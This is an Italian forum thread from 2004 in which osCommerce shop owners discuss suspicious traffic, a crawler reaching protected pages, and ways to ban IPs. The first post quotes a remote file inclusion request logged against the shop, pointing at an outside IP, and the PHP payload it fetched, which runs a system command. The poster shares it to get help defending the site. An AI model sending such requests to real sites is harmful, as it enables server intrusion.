Sicurezza Oscommerce !!

Mell · Messaggio da **Mell** » 22/09/2004, 9:30

Ho notato che mi stanno inserendo dal browser delle stringhe tipo quelle per inserire dei comandi sql su phpnuke. La stessa stringa infatti è rilevata come tentativo d' intrusione in un portale phpnuke con sentinel (modulo per bloccare le intrusioni).
Le stringhe inserite sono queste:

Codice: Seleziona tutto

/catalog/products_new.php?page=http://66.89.120.35/ebekpko?

che da questo output:

Codice: Seleziona tutto

<?php echo "\nbl3"; echo "bl3 "; passthru("uname -a 2>&1"); ?>

Mi sembra che c'è un contributo per bannare gli ip, potrebbe bastare?
Aiuto Hozone!

ioivi · Messaggio da **ioivi** » 22/09/2004, 11:51

Io invece ho "guest" che accedono a pagine in teoria non accessibili ad un "guest"

Appena ne becco uno posto il link della pagina dove si trova .. mi è appena scappato ... quello che è interessante è l'ip ..

http://www.dnsstuff.com/tools/whois.ch?ip=65.54.188.74

Non credo molto al loro interesse per il mio store

Domina · Messaggio da **Domina** » 22/09/2004, 13:02

scusatemi ma come fate a usare dnsstuf su oscommerce?lo piazzate in remoto o come lo fate funzionare?

ioivi · Messaggio da **ioivi** » 22/09/2004, 13:12

Domina ha scritto:scusatemi ma come fate a usare dnsstuf su oscommerce?lo piazzate in remoto o come lo fate funzionare?

Ho modificato il file whos_online.php.
Mi basta cliccare sul link in admin, si apre la pagina con il link che ho postato sopra

Domina · Messaggio da **Domina** » 22/09/2004, 13:30

ohhhh hai modificato whos_online.php...
e ti chiedo molto se ci dici come si modifica? : )

ioivi · Messaggio da **ioivi** » 22/09/2004, 14:15

Domina ha scritto:ohhhh hai modificato whos_online.php...
e ti chiedo molto se ci dici come si modifica? : )

hehe .. io sono imbranato, non è tutta farina del mio sacco ...
Ho preso questa contribution:
http://www.oscommerce.com/community/con ... hos_online
La versione 1.2.5 per la precisione (ho visto ora che ci sono stati aggiornamenti)
Poi l'ho tradotta in italiano e modificato il codice per utilizzare dnsstuf
Il risultato?
Scarica la mia versione da qui
http://www.1accessori.it/contribution/w ... .5_ita.zip
Rinomina l'originale che trovi in catalog/admin e metti al suo posto questa versione.
Dimmi come la trovi

ioivi · Messaggio da **ioivi** » 22/09/2004, 17:05

ioivi ha scritto:Appena ne becco uno posto il link della pagina dove si trova ..

Beccato!

Si trova qui ora
/catalog/checkout_shipping.php?osCsid=acea598dcc5019a2d586079ecb

con questo ip
http://www.dnsstuff.com/tools/whois.ch?ip=65.54.188.74

Sto qui da guest ci arriva .. io no, mi devo loggare ... come mai??
Guardate qui:

Immagine

ioivi · Messaggio da **ioivi** » 24/09/2004, 14:07

rieccolo un un'altra pagina ...

Immagine

Nausicaa · Messaggio da **Nausicaa** » 25/09/2004, 1:34

Quell'indirizzo insieme a molti altri appartengono all'MSN Bot, ovvero il motore di ricerca di microsoft, invasivo come pochi, che cerca di indicizzare tutto il mondo.... nel vero senso della parola...
Sul mio server sono arrivato a bannare tutti gli indirizzi al momento conosciuti... consuma banda come una sanguisuga, e altrettante risorse...
apre decine di connessioni contemporaneamente (e si permette addirittura di prendere e cercare di mandare messaggi privati sul forum dello stesso sito....).
Me lo ha fatto anche oggi, è stato più di un'ora a fare gli indici dell'oscommerce..... e poi mi chiedevo come mai andava lento il server....
comunque ora è in black list... fatelo anche voi se non volete che vi rompa le scatole.

johnnystecco · Messaggio da **johnnystecco** » 25/09/2004, 8:43

Ciao, anch'io ho lo stesso problema ed è quasi 24 ore che consuma banda. Come posso mettrelo nella black list?
Grazie

Nausicaa · Messaggio da **Nausicaa** » 25/09/2004, 9:07

Io lo ho bannato direttamente nel firewall del server, a quanto ne so in oscommerce non c'è un sistema di ban degli ip.

Domina · Messaggio da **Domina** » 25/09/2004, 9:35

vediamo effettivamente quanti shop hanno questo problema...
nn c'è una versione di osc da prendere in esempio ex poterla confrontare con la nostra?

ioivi · Messaggio da **ioivi** » 25/09/2004, 17:49

Nausicaa ha scritto:Quell'indirizzo insieme a molti altri appartengono all'MSN Bot, ovvero il motore di ricerca di microsoft, invasivo come pochi. ... cut ..

Alla faccia dell'invasivo .. scusa come fa a leggere quei file da "guest"?
Io ne faccio una questione di sicurezza
Se tu provi ad andare a leggere quelle pagine da guest oscommerce ti spedisce nella pagina login.php ... perchè loro arrivano fino a li?

ioivi · Messaggio da **ioivi** » 25/09/2004, 23:56

Nausicaa ha scritto:Io lo ho bannato direttamente nel firewall del server, a quanto ne so in oscommerce non c'è un sistema di ban degli ip.

Questo non potrebbe andare bene?
http://www.oscommerce.com/community/con ... rch,ban+ip

Nausicaa · Messaggio da **Nausicaa** » 26/09/2004, 1:47

ioivi ha scritto:
Nausicaa ha scritto:Quell'indirizzo insieme a molti altri appartengono all'MSN Bot, ovvero il motore di ricerca di microsoft, invasivo come pochi. ... cut ..
Alla faccia dell'invasivo .. scusa come fa a leggere quei file da "guest"?
Io ne faccio una questione di sicurezza
Se tu provi ad andare a leggere quelle pagine da guest oscommerce ti spedisce nella pagina login.php ... perchè loro arrivano fino a li?

Non sò dirti perchè riesca ad arrivare sino a li, sò solo che anche con il forum lo trovo ogni tanto che cerca di spedire messaggi privati agli utenti...
magari hanno un archivio con tutti i file e cercano di forzare il sistema continuando ad insistere....
cosa che mi aspetto da microsoft